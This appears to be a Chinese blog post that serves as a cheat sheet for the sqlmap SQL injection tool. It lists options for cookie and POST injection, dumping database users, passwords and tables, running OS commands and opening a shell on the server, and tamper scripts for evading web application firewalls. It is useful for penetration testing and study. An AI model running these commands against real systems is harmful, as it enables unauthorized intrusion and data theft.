• sqlmap详解


    -hh 获得详细帮助

    -v  详细级别 0-6 默认为1

    1.显示基本信息和警告信息

    2.显示debug信息

    3.显示注入的payload   建议使用

    4.显示http请求

    5.显示http响应

    6.显示http响应页面

    -d 直接连接数据库

    -u 目标url

    -r 从文件载入http请求 需要带绝对路径

    Cookie 注入 sqlmap.py  -u "www.xxxxxx.com"  --cookie  "id=1"   -level 2 要将等级调为2才进行cookie 的测试

    post 注入  sqlmap.py  -u "www.xxxx.com"  --data  "id=1"

                   sqlmap.py  -u "www.xxxx.com"  --data  "username=&passwd=" (像一些表单提交型的,直接抓包,查看提交参数,写给data)

                   sqlmap.py  -r  "请求数据包的文件 "  -p "id 可测试的参数"

    --users 枚举数据库管理系统用户

    --password  枚举数据库管理密码

    access数据库的注入(--tables 列表名  --columns 列字段  --dunmp 下载数据)

    除access数据库的其他数据库( --is-dba  查看当前数据库的权限、 --dbs  查看所有数据库名、--users 所有数据库用户 、 --current-db  当前数据库名、current-user 当前数据库用户)

    --os-cmd cmd执行操作系统命令 ( 列: sqlmap.py -u "wwww.xxxxxxx.com" --os-cmd="net user" 相当于执行net user 命令 )

    --os-shell  相当于给服务器写交互式shell  退出时一定要quit() 要不退出时,会把shell留在服务器上

    --random-agent  随机选定Http的user-Agernt

    --proxy  使用代理连接到目标url

    绕过WAF的tamper插件的使用:

    sqlmap.py  -u "www.xxxx.com"  -tamper  "脚本.py"

    宽字节绕过 unmagicquotes.py 

    用 /**/分割sql关键字  randomcomments.py

    注释绕过  versionedkeywords.py

    将注入语句插入带指定位置  (针对静态注入

    sqlmap.py -u "www.xxxxxx.com/id/1*.html"  *代表注入的位置

  • 相关阅读:
    洛谷2444(Trie图上dfs判环)
    【做题】Codeforces Round #453 (Div. 1) D. Weighting a Tree——拆环
    【做题】POJ3469 Dual Core CPU——第一道网络流
    【做题】atc_cf17-final_E
    【做题】spoj4060 A game with probability——dp
    Matlab AlexNet 识别花
    minutia cylinder code MCC lSSR 匹配算法
    Gabor filter for image processing and computer vision
    MATLAB 去掉数组里面不要的元素
    NBIS指纹特征提取与匹配软件使用
  • 原文地址:https://www.cnblogs.com/pojun/p/6845169.html
Copyright © 2020-2023  润新知